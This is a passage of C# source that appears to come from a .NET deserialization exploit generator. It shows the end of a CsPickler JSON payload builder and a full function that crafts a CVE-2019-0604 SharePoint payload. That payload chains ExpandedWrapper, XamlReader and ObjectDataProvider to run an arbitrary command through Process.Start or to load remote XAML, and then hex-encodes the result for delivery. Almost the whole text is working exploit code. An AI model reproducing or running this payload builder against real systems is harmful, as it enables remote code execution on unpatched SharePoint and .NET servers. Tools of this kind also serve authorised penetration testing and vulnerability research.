""PublicKeyToken"": ""b77a5c561934e089"" } }, ""Value"": """ + internalPayload + @""" } ] } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true); serializer.UnPickleOfString <Object>(payload); } catch { } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public string CVE_2019_0604() { /* * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema""> * <ExpandedElement/> * <ProjectedProperty0> * <MethodName>Parse</MethodName> * <MethodParameters> * <anyType xsi:type=""xsd:string""> * <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> * </anyType> * </MethodParameters> * <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> * </ProjectedProperty0> * </ExpandedWrapperOfXamlReaderObjectDataProvider>"; * //*/ string payloadPart1 = ""; string payloadPart2 = ""; if (useurl) { InputArgs inputArgs = new InputArgs(); inputArgs.Cmd = "foobar"; inputArgs.IsRawCmd = true; inputArgs.ExtraInternalArguments = new List <String> { "--variant", "3", "--xamlurl", cmd }; inputArgs.Minify = true; inputArgs.UseSimpleType = true; payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":"; payloadPart1 = payloadPart1.Replace(" ", ""); TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator(); payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs); } else { payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:"; Boolean hasArgs; string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs); String cmdPart; if (hasArgs) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>"; } payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>"; } //payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true); //Console.WriteLine(payloadPart2); string payload = payloadPart1 + payloadPart2; Console.WriteLine(payload); StringBuilder stringBuilder = new StringBuilder(); stringBuilder.Append("__bp"); HexEncode(checked ((char)(payload.Length << 2)), stringBuilder); HexEncode(payload, stringBuilder); return(stringBuilder.ToString()); }